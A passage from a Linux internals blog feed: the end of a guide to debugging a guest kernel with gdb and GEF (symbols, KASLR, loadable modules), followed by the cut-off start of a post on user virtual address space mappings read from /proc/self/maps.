<p>Thanks to gdbstubs<a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">[2]</a>, the target side of gdb&rsquo;s remote debugging protocol that virtualisation software (VMware, QEMU etc.) implements for its guests, we&rsquo;re able to remotely debug our guest kernel with much the same functionality we&rsquo;d expect from userland debugging: breakpoints, viewing/setting registers and memory etc. etc.[3]</p>
<p>I&rsquo;ll use this opportunity to plug <a href="https://gef.readthedocs.io/en/master/">GEF</a> (GDB Enhanced Features) cos let&rsquo;s not forget gdb is like 36 years old and your boy needs some colours up in his CLI. Beyond just colours, gef has a great suite of quality-of-life features that just make the debugging workflow easier.</p>
<p>❗</p>
<p>Note that future GDB snippets will be using GEF, definitely not in an attempt to convert you, so don&rsquo;t be scared by the <code>gef➤</code> prompt; it&rsquo;s all the same program.</p>
<p>Anyway, enough rambling, let&rsquo;s take a look at getting kernel debugging set up on our VM:</p>
<ol>
<li><strong>Enable the gdbstub on your guest</strong><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">[4]</a>; typically this will listen on an interface:port you specify on the host. E.g. QEMU&rsquo;s <code>-s</code> flag is shorthand for <code>-gdb tcp::1234</code>, so the stub listens on port 1234.</li>
<li>Now on your host, or another guest that can reach the listening interface on your host, you can spin up gdb[5] and connect:</li>
</ol>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ gdb
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">gef➤ target remote :1234 
</span></span><span class="line"><span class="cl">gef➤ <span class="c1"># you can omit localhost, so just :1234 works too</span>
</span></span></code></pre></div><p>And just like that, you&rsquo;re now remotely debugging the Linux kernel - awesome, right? Except if you&rsquo;ve just fired up gdb and connected like the snippet above, you&rsquo;re probably seeing something like this (my stub happened to be listening on port 12345, hence the different port):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gef➤  target remote :12345
</span></span><span class="line"><span class="cl">Remote debugging using :12345
</span></span><span class="line"><span class="cl">warning: No executable has been specified and target does not support
</span></span><span class="line"><span class="cl">determining executable automatically.  Try using the &#34;file&#34; command.
</span></span><span class="line"><span class="cl">0xffffffffa703f9fe in ?? ()
</span></span><span class="line"><span class="cl">[ Legend: Modified register | Code | Heap | Stack | String ]
</span></span><span class="line"><span class="cl">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
</span></span><span class="line"><span class="cl">[!] Command &#39;context&#39; failed to execute properly, reason: &#39;NoneType&#39; object has no attribute &#39;all_registers&#39;
</span></span><span class="line"><span class="cl">gef➤  info reg
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">rip            0xffffffffa703f9fe  0xffffffffa703f9fe
</span></span></code></pre></div><p>Huh, so we&rsquo;ve connected and it looks like we&rsquo;ve trapped execution at <code>0xffffffffa703f9fe</code>, but gdb has no idea where we are&hellip; This does not bode well for a productive debugging session; so let&rsquo;s look at how to fix that!</p>
<h4 id="vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</h4>
<p>So although our gdb has managed to make contact with the gdbstub on our guest, it&rsquo;s far from omnipotent. It can interact with memory and read the registers, as it understands the architecture, however it doesn&rsquo;t know about the kernel&rsquo;s functions and data structures.</p>
<p>Unfortunately for us that&rsquo;s the whole reason we&rsquo;re doing kernel debugging, to debug the kernel! Luckily though, it&rsquo;s fairly simple to tell gdb everything it needs to know.</p>
<p>If you&rsquo;ve read my <a href="https://sam4k.com/linternals-the-modern-boot-process-part-2/">Linternals: The (Modern) Boot Process [0x02]</a>, you&rsquo;ll know that there&rsquo;s a file called <code>vmlinux</code> containing the decompressed kernel image as a statically linked ELF. Just like debugging a userland binary, we can load this <code>vmlinux</code> into gdb and it&rsquo;s able to interpret it without any dramas.</p>
<p>Importantly, though, just like userland debugging we want to make sure we load a <code>vmlinux</code> with debugging symbols included; there are a couple of options for this:</p>
<ul>
<li>If you&rsquo;re building from source, just include <code>CONFIG_DEBUG_INFO=y</code> and optionally <code>CONFIG_GDB_SCRIPTS=y</code> and you&rsquo;ll find your vmlinux with debug symbols in your build root (see <a href="compiling/README.md">compiling/README.md</a> for more info on building)
<ul>
<li><code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code> will enable these in your config with minimal fiddling</li>
</ul>
</li>
<li>If you&rsquo;re running a distro kernel, you can check your distro&rsquo;s repositories to see if you can pull debug symbols
<ul>
<li>On Ubuntu, if you update your sources and keyring <a href="https://wiki.ubuntu.com/Debug%20Symbol%20Packages">[1]</a>, you can pull the debug symbols by running <code>$ sudo apt-get install linux-image-$(uname -r)-dbgsym</code> and should find your <code>vmlinux</code> @ <code>/usr/lib/debug/boot/vmlinux-$(uname -r)</code></li>
</ul>
</li>
</ul>
<p>And just like that, we&rsquo;re done! jk, there&rsquo;s one more common gotcha (that I always forget) and that&rsquo;s KASLR: Kernel Address Space Layout Randomization. As it sounds, this randomizes where the kernel image is loaded into memory at boot time; so the addresses gdb reads from the vmlinux will naturally be wrong&hellip;</p>
<ul>
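<li>You can add <code>nokaslr</code> to your boot options for a single boot, typically via the grub menu at boot</li>
<li>Or make it persistent by editing <code>/etc/default/grub</code>, including <code>nokaslr</code> in <code>GRUB_CMDLINE_LINUX_DEFAULT</code> and regenerating the grub config (e.g. <code>sudo update-grub</code> on Debian/Ubuntu)</li>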
</ul>
<p>After that we really are ready, and can repeat the steps from before, remembering to also load our <code>vmlinux</code> with gdb:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ gdb vmlinux
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">gef➤  target remote :12345 
</span></span><span class="line"><span class="cl">... 
</span></span><span class="line"><span class="cl">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#0] Id 1, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#1] Id 2, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#2] Id 3, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#3] Id 4, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#0] 0xffffffff81c3f9fe → native_safe_halt()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#1] 0xffffffff81c3fc4d → arch_safe_halt()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#2] 0xffffffff81c3fc4d → acpi_safe_halt()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#3] 0xffffffff81c3fc4d → acpi_idle_do_entry(cx=0xffff88810187d864)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#4] 0xffffffff816e4201 → acpi_idle_enter(dev=&lt;optimized out&gt;, drv=&lt;optimized out&gt;, index=&lt;optimized out&gt;)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#5] 0xffffffff8198e56d → cpuidle_enter_state(dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, index=0x1)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#6] 0xffffffff8198e88e → cpuidle_enter(drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, dev=0xffff888105a61c00, index=0x1)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#7] 0xffffffff810e7fa2 → call_cpuidle(next_state=0x1, dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#8] 0xffffffff810e7fa2 → cpuidle_idle_call()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#9] 0xffffffff810e80c3 → do_idle()</span>
</span></span><span class="line"><span class="cl">───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
</span></span><span class="line"><span class="cl">gef➤  
</span></span></code></pre></div><p>Awesome! Now gdb knows exactly where we are, and gef provides us lots of useful information in its <code>ctx</code> menu, which you can always pop up with the <code>ctx</code> command.</p>
<p>I&rsquo;ve cut it off for brevity but we can at a glance see sections (might need to scroll right for the headings) for registers, stack, code, threads and trace!</p>
<p>On top of that, as I&rsquo;ll touch on in <strong>Misc GDB Tips</strong> below, we&rsquo;re able to explore all the kernel structures and more thanks to the symbols we now have.</p>
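<p>As a quick aside on that KASLR gotcha, comparing the two sessions above gives a feel for what the randomisation did. This is only a sketch, and it leans on an assumption I can&rsquo;t verify from the output alone: that both sessions stopped on the same instruction of the same kernel build (the identical low bits, <code>0x3f9fe</code>, at least make that plausible). The function names are my own.</p>

```python
# rip from the first session (KASLR on, no symbols loaded)
RANDOMISED_RIP = 0xFFFFFFFFA703F9FE
# address inside native_safe_halt() from the session booted with nokaslr
UNRANDOMISED_RIP = 0xFFFFFFFF81C3F9FE


def kaslr_slide(runtime_addr, link_addr):
    """Offset between where code is running and where vmlinux expects it."""
    return runtime_addr - link_addr


def to_link_addr(runtime_addr, slide):
    """Translate a randomised runtime address back to a vmlinux address."""
    return runtime_addr - slide


if __name__ == "__main__":
    slide = kaslr_slide(RANDOMISED_RIP, UNRANDOMISED_RIP)
    print(hex(slide))             # 0x25400000
    print(slide % 0x200000 == 0)  # True: a multiple of 2 MiB
```

<p>Under that assumption the whole image was shifted by <code>0x25400000</code>, so every symbol address gdb reads from <code>vmlinux</code> would be off by the same amount; hence disabling KASLR (or telling gdb about the offset) before expecting symbols to line up.</p>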
<h4 id="loadable-modules">Loadable Modules</h4>
<p>As a quick aside, you might find out that some symbols for certain modules are missing, despite doing all that <code>vmlinux</code> faff above. This is because not all modules are compiled into the kernel, some are compiled as loadable modules.</p>
<p>This means that the modules are only loaded into memory when they&rsquo;re needed, e.g. via <code>modprobe</code>. We can check how a module is built in our <code>.config</code>:</p>
<ul>
<li><code>CONFIG_YOUR_MODULE=y</code> defines an in-kernel module</li>
<li><code>CONFIG_YOUR_MODULE=m</code> defines a loadable kernel module</li>
</ul>
<p>For loadable modules, we need to do a couple of extra steps, <strong>in addition to those above</strong>, in order to let gdb know about these symbols:</p>
<ul>
<li>Copy the module&rsquo;s <code>your_module.ko</code> from your debugging target; try <code>/lib/modules/$(uname -r)/kernel/</code></li>
<li>On your debugging target, find out the base address of the module; try <code>sudo grep -e &quot;^your_module&quot; /proc/modules</code></li>
<li>In your gdb session, you can now load in the module by <code>(gdb) add-symbol-file your_module.ko 0xAddressFromProc</code> - voila!</li>
</ul>
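<p>The steps above can be sketched in Python as a tiny helper that turns a line from <code>/proc/modules</code> into the matching gdb command. The helper names and the sample line (module name, size and address) are made up for illustration. Note that without root the address column typically reads as zeroes, which is why the <code>grep</code> above uses <code>sudo</code>.</p>

```python
def parse_proc_modules_line(line):
    """Split one /proc/modules line into its name, size, state and address.

    The fields are: name, size, refcount, dependencies, state, address
    (optionally followed by taint flags).
    """
    fields = line.split()
    if len(fields) not in (6, 7):
        raise ValueError("unexpected /proc/modules line: " + repr(line))
    return {
        "name": fields[0],
        "size": int(fields[1]),
        "state": fields[4],
        "address": int(fields[5], 16),
    }


def add_symbol_file_command(ko_path, line):
    """Build the gdb command that loads ko_path at the module's address."""
    module = parse_proc_modules_line(line)
    return "add-symbol-file %s %#x" % (ko_path, module["address"])


if __name__ == "__main__":
    # Hypothetical line; real values come from your debugging target
    sample = "your_module 327680 0 - Live 0xffffffffc0a3b000"
    print(add_symbol_file_command("your_module.ko", sample))
```

<p>If the symbols still look off, <code>/sys/module/your_module/sections/.text</code> on the target is another place to read the text section address from.</p>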
<p>Sorted! Now the symbols from <code>your_module</code> should be available in gdb! Just remember that even with KASLR disabled, this address can be different each time you load the module, but you only need to grab the <code>your_module.ko</code>  once at least.</p>
<h4 id="misc-gdb-tips">Misc GDB Tips</h4>
<p><img src="https://sam4k.com/content/images/2022/04/whathaveidone.gif" alt=""></p>
<p>Oof, well this post is already careening towards 4000 words (and I did this voluntarily, for fun?!), so I think I&rsquo;ll just link to my repository where you can find some useful gdb/gef commands for debugging the Linux kernel!</p>
<p><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#useful-gdb-commands">linux-kernel-resources/debugging at main · sam4k/linux-kernel-resources</a></p>
<h4 id="other-stuff">Other Stuff</h4>
<p>As we&rsquo;re transitioning into a speedrun, congratulations to anyone who read the whole thing, I&rsquo;ll attempt to quickly touch on some other useful debugging resources:</p>
<ul>
<li><a href="https://github.com/osandov/drgn">drgn</a>: remember earlier, when I said debugging the kernel you&rsquo;re using can be tricky? Well drgn is an extremely programmable debugger, written in Python (and not 36 years ago), that among other things allows you to do live introspection on your kernel. I still need to explore this more, but I wouldn&rsquo;t see it as a replacement for gdb for example, but a different tool for different goals.</li>
<li><strong>strace</strong>: ah yes, our old friend, strace(1). The system call tracing utility can be useful for complementing your kernel debugging by tracing the interactions between your poc/userland interface/program and the kernel. With minimal faff you can home in on what kernel functions you may want to focus your debugging endeavours on.</li>
<li><strong>procfs</strong>: another reminder about the various introspection available via <code>/proc/</code>; you saw earlier that we made use of <code>/proc/modules</code>. There&rsquo;s plenty to explore here.</li>
<li><strong>man pages</strong>: don&rsquo;t sleep on the man pages! Although there aren&rsquo;t generally pages on kernel internals, the syscall section <code>(2)</code> can help with understanding some of the interactions that go on</li>
<li><strong>source</strong>: due to word count concerns, oops, and the fact I never really use it, I haven&rsquo;t included adding source into gdb but that doesn&rsquo;t mean you can&rsquo;t have it up for reference! I always try to have a copy of source handy to explore, not to mention the documentation that&rsquo;s usually available somewhere in the kernel too</li>
</ul>
<hr>
<ol>
<li><a href="https://www.sourceware.org/gdb/">https://www.sourceware.org/gdb/</a></li>
<li><a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html</a></li>
<li>Future post idea? Dive into some debugging internals</li>
<li><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb&ndash;vm</a></li>
<li>If your guest is a different architecture to your host, gdb needs to know about it, so you&rsquo;ll need to install and use <code>gdb-multiarch</code></li>
</ol>
<h2 id="faq">FAQ</h2>
<p>So this is a little bit of an experiment, and maybe more suited to the GitHub repo, but if anyone has any questions feel free to <a href="https://twitter.com/sam4k1">@ me on Twitter</a> and I&rsquo;ll try to keep this FAQ updated. Also, if anyone has any suggestions for FAQs, I&rsquo;m happy to add those too :)</p>
<h2 id="postamble">Postamble</h2>
<p><img src="https://sam4k.com/content/images/2022/04/didwemakeit.gif" alt=""></p>
<p>Talk about feature creep, eh? We certainly covered a lot of ground in this post: from building the kernel to patching modules to setting up our debugging environment.</p>
<p>Hopefully some of this (or all!) has been useful, and maybe helped demystify things. As I briefly mentioned in the intro, I&rsquo;ve included all the essentials in a <a href="https://github.com/sam4k/linux-kernel-resources">github repository</a>, which I&rsquo;ll continue to update with any useful Linux kernel resources/demos/shenanigans.</p>
<p><a href="https://github.com/sam4k/linux-kernel-resources">GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists.</a></p>
<p>I think by nature of the work we do, as programmers and &ldquo;hackers&rdquo;, a lot of times we find ourselves creating hacky solutions and shortcuts, then through some twisted process of natural selection some of these make their way into our workflow.</p>
<p>Though, perhaps because we consider them too niche or too messy, we often don&rsquo;t share these solutions or quick tricks and so the cycle continues. Is this necessarily a bad thing? Of course not! I love to tinker and believe me, I have many a bash script that should never see the light of day, but perhaps there&rsquo;s also a few that would help others if they did.</p>
<p>So really, this post is just a culmination of my own hacky, messy natural selection that has occurred during my time working on kernel stuff, so don&rsquo;t @ me if it&rsquo;s horribly wrong (DM me instead, pls help me), but hopefully there&rsquo;s some takeaways here that will inspire others to tinker and perhaps save some time in the process.</p>
<p><em><strong>Obligatory <a href="https://twitter.com/sam4k1">@ me</a> for any suggestions, corrections or questions!</strong></em></p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The User Virtual Address Space</title><description>We continue our journey to understand virtual memory in Linux, as we take a closer look at the user virtual address space.</description><link>https://sam4k.com/linternals-virtual-memory-0x02/</link><guid isPermaLink="false">61e3402b7742d008b38dce20</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Sun, 20 Mar 2022 19:00:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Ready to dive back into some Linternals? I hope so! So to recap, <a href="https://sam4k.com/linternals-virtual-memory-part-1/">last time</a>, we covered some virtual memory fundamentals including:</p>
<ul>
<li>Virtual vs physical memory</li>
<li>The virtual address space</li>
<li>The VM split (user and kernel virtual address spaces)</li>
</ul>
<p>This time we&rsquo;re going to zoom in and focus on the two parts of the virtual memory split, taking a look at the user and kernel virtual address spaces.</p>
<p>Hopefully, after that, we&rsquo;ll have a good idea of how - and why - our Linux system uses virtual memory. At which point we&rsquo;ll take a look at how this is all implemented behind the scenes, examining some kernel and hardware specifics!</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x04-user-virtual-address-space">0x04 User Virtual Address Space</a>
<ul>
<li><a href="#userspace-mappings">Userspace Mappings</a></li>
<li><a href="#the-setup">The Setup</a>
<ul>
<li>brk()</li>
<li>mmap()</li>
<li>mprotect()</li>
<li>execve()</li>
</ul>
</li>
<li><a href="#threads">Threads</a></li>
<li><a href="#aslr">ASLR</a></li>
<li><a href="#wrapping-up-in-uvas">Wrapping Up In UVAS</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x04-user-virtual-address-space">0x04 User Virtual Address Space</h2>
<p>Alrighty then, first things first, let&rsquo;s take a look at what a typical process actually uses the user virtual address space (UVAS) for. Luckily, I don&rsquo;t have to whip up a diagram for this, as we can use the <code>/proc</code> filesystem!</p>
<p>❓</p>
<p>procfs is a virtual filesystem that is created at boot. It acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime (sysctl). [1]</p>
<p>Inside procfs, you can inspect running processes by PID. For example, the file <code>/proc/854/maps</code> will contain information about the mappings for process with PID 854.</p>
<p>To make life easier, there&rsquo;s a handy link, <code>/proc/self/</code>, which will point to the process currently reading the file - pretty neat! Beyond <code>maps</code>, there&rsquo;s all sorts of information we can learn from procfs; check <code>man procfs</code> for more info.</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/filesystems/proc.html">https://www.kernel.org/doc/html/latest/filesystems/proc.html</a></li>
</ol>
<h3 id="userspace-mappings">Userspace Mappings</h3>
<p>Back on topic! Let&rsquo;s use the procfs to take a closer look at what our UVAS is being used for. From the man page, we learn the <code>maps</code> procfs file contains &ldquo;the currently mapped memory regions and their access permissions&rdquo; for a process.</p>
<p>We&rsquo;ll touch more on the implementation later, but for now it&rsquo;s worth remembering that the virtual address space is <strong>vast</strong> and largely empty. If a process needs to use some memory, either to load the contents of a file or to store data, it will ask the kernel to map that memory appropriately. Now that virtual address is actually pointing to something.</p>
<p>Using the <code>self</code> link we talked about earlier, and the <code>maps</code> file, we can use <code>cat</code> to output the details of its own memory mappings:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">$</span> cat /proc/self/maps 
</span></span><span class="line"><span class="cl"><span class="go">5577277d1000-5577277d3000 r--p 00000000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277d8000-5577277db000 r--p 00007000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277db000-5577277dc000 r--p 00009000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277dc000-5577277dd000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">557728bca000-557728beb000 rw-p 00000000 00:00 0                          [heap]
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863779000-7fc863a63000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863a63000-7fc863a66000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863a66000-7fc863a92000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863a92000-7fc863c08000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c08000-7fc863c5c000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c5c000-7fc863c5d000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c5d000-7fc863c60000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c60000-7fc863c63000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c63000-7fc863c72000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c7e000-7fc863ca0000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863ca0000-7fc863ca2000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863ca2000-7fc863cc9000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863cc9000-7fc863cd4000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863cd5000-7fc863cd7000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863cd7000-7fc863cd9000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7ffddc9a0000-7ffddc9c1000 rw-p 00000000 00:00 0                          [stack]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffddc9f4000-7ffddc9f8000 r--p 00000000 00:00 0                          [vvar]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffddc9f8000-7ffddc9fa000 r-xp 00000000 00:00 0                          [vdso]
</span></span></span><span class="line"><span class="cl"><span class="go">ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</span></span></span></code></pre></div><p>Sweet! Well, there&rsquo;s a lot to unpack here, though some of it should look familiar. Consulting <code>man procfs</code> we can see the columns are as follows:</p>
<p><code>(virtual) address,   perms,   offset,   dev,   inode,   pathname</code></p>
<p>If we recall from last time, on a typical x86_64 setup like mine, the most significant 16 bits (MSB 16) are all 0 for userspace virtual addresses and all 1 for kernel virtual addresses.</p>
<p>This means we can normally spot kernel addresses at a glance, as they begin with <code>0xffff...</code>, while userspace addresses begin with <code>0x0000...</code> and, with the leading zeros dropped, typically look shorter.</p>
<p>Anyway, before we scroll too far away from the code block (oops), let&rsquo;s unpack some of these lines of output shall we?</p>
<ul>
<li><strong>Lines 2-6</strong>: here we can see the mappings for the binary being run, found at <code>/usr/bin/cat</code>. Why are there multiple mappings for one binary file? Typically programs are made up of multiple sections, with differing perms. The .text section where the code is? We&rsquo;ll want that readable &amp; executable. Some portions of data, like our static consts, want to be read only (.rodata), while mutable data wants to be readable and writable (.data) [1]</li>
<li><strong>Line 7:</strong> procfs uses the pseudo-path <code>[heap]</code> to describe the mapping for the heap (no surprise there); a dynamic memory pool</li>
<li><strong>Lines 8,10-15:</strong> next up we can see several shared libraries being mapped into memory, for the program to use. We can see locale information and libc; again these may be split up into multiple mappings as touched on a moment ago [2]</li>
<li><strong>Lines 9,16,17:</strong> these weird mappings with no pathname are called <strong>anonymous mappings</strong> and are not backed by any file. This is essentially a blank memory region that a userspace process can use at its discretion. Examples of anonymous mappings include both the stack and the heap [3]</li>
<li><strong>Lines 18-22:</strong> <code>ld.so</code> is the dynamic linker that is invoked anytime we run a dynamically linked program (a quick check of <code>file /usr/bin/cat</code> will confirm this is indeed a dynamically linked program!)</li>
<li><strong>Line 23:</strong> another pseudo-path, <code>[stack]</code> is the mapping for our process&rsquo;s stack space</li>
<li><strong>Line 25:</strong> The &ldquo;virtual dynamic shared object&rdquo; (or vDSO) is a small shared library exported by the kernel to accelerate the execution of certain system calls that do not necessarily have to run in kernel space [5]</li>
<li><strong>Line 24:</strong> The <code>vvar</code> is a special page mapped into memory in order to store a &ldquo;mirror&rdquo; of kernel variables required by the virtual syscalls exported by the kernel</li>
<li><strong>Line 26:</strong> The <code>vsyscall</code> mapping is a legacy mechanism: it used to provide an executable mapping of kernel code for specific syscalls that didn&rsquo;t require elevated privileges, and hence didn&rsquo;t need the whole user -&gt; kernel mode context switch. Suffice to say it&rsquo;s defunct now; calls into the vsyscall table still work for compatibility, but they now trap and are handled like a normal syscall [6]</li>
</ul>
<p>And just like that we&rsquo;ve pieced together the various userspace (and some kernel stuff) mappings for an everyday program like <code>cat</code>! Pretty neat. In addition we&rsquo;ve dived into some of the tools the kernel provides us to examine this information.</p>
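<p>If you fancy poking at this programmatically, here&rsquo;s a minimal sketch of parsing a single <code>maps</code> line into the columns listed above and applying the &ldquo;top 16 bits&rdquo; check. The struct and function names (<code>map_entry</code>, <code>parse_maps_line()</code>, <code>is_kernel_address()</code>) are made up for illustration, and the kernel check assumes the 4-level x86_64 layout described above.</p>

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One parsed line of /proc/<pid>/maps (names here are illustrative). */
struct map_entry {
    uint64_t start, end;   /* virtual address range [start, end) */
    char perms[5];         /* e.g. "r-xp" */
    uint64_t offset;       /* offset into the backing file */
    char dev[16];          /* major:minor of the backing device */
    uint64_t inode;        /* 0 for anonymous mappings */
    char path[256];        /* empty for anonymous mappings */
};

/* Returns 1 on success, 0 if the line doesn't look like a maps entry. */
static int parse_maps_line(const char *line, struct map_entry *e)
{
    assert(line != NULL && e != NULL);
    memset(e, 0, sizeof(*e));
    int n = sscanf(line,
                   "%" SCNx64 "-%" SCNx64 " %4s %" SCNx64
                   " %15s %" SCNu64 " %255[^\n]",
                   &e->start, &e->end, e->perms, &e->offset,
                   e->dev, &e->inode, e->path);
    /* The pathname column is optional, so 6 matched fields is fine. */
    return n >= 6;
}

/* Assumes 4-level paging on x86_64: top 16 bits all set means kernel. */
static int is_kernel_address(uint64_t addr)
{
    return (addr >> 48) == 0xffff;
}
```

<p>Feeding it each line read from <code>/proc/self/maps</code> (e.g. via <code>fgets()</code>) should flag only the <code>[vsyscall]</code> entry as a kernel address.</p>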
<hr>
<ol>
<li>For more information on the different sections of our binary, we can cross-reference the <code>offset</code> information we get from <code>/proc/self/maps</code> with the ELF section headers using <code>objdump -h /usr/bin/cat</code></li>
<li><code>ldd</code> lets us print the shared libraries required by a program. We can explore this more by checking out <code>ldd /usr/bin/cat</code>, though for reasons out of scope for this post, it won&rsquo;t look identical to our <code>maps</code> output</li>
<li>If we want to get ahead of ourselves, <code>man 2 mmap</code> [4] describes the system call userspace programs use to ask the kernel to map regions of memory</li>
<li>The <code>2</code> in <code>man 2 mmap</code> says we want to look at man section 2, for syscalls, and not section 3 for lib functions. <code>man -k mmap</code> lets us search all the sections for references to <code>mmap</code></li>
<li><a href="https://lwn.net/Articles/615809/">Implementing virtual system calls @ LWN</a></li>
<li>As expected, we can see the vsyscall address is located within the kernel half of the virtual address space, by the leading <code>0xffff...</code></li>
</ol>
<h3 id="the-setup">The Setup</h3>
<p>I think I&rsquo;m going to cover the kernel and hardware side of things in coming sections, but it&rsquo;s worth touching on how we go from running <code>cat /proc/self/maps</code> to the memory mapping we saw above.</p>
<p><img src="https://sam4k.com/content/images/2022/03/how_that_happeen.gif" alt=""></p>
<p>In the last part we mentioned that system calls act as the fundamental interface between userspace applications and the kernel. If an unprivileged userspace process needs to do a privileged action (e.g. map some memory), it can use the syscall interface to ask the kernel to carry out this action on its behalf [1].</p>
<p>Now that we know what&rsquo;s being mapped, let&rsquo;s have a closer look at how, by revisiting <code>strace</code>. <code>strace</code> simply traces the system calls and signals made by a program. As we know memory mapping is handled by the kernel and system calls are how programs get the kernel to do this, <code>strace</code> seems like a good bet!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">$</span> strace cat /proc/self/maps
</span></span><span class="line"><span class="cl"><span class="go">execve(&#34;/usr/bin/cat&#34;, [&#34;cat&#34;, &#34;/proc/self/maps&#34;], 0x7fff3a014fd8 /* 61 vars */) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">brk(NULL)                               = 0x5622ee613000
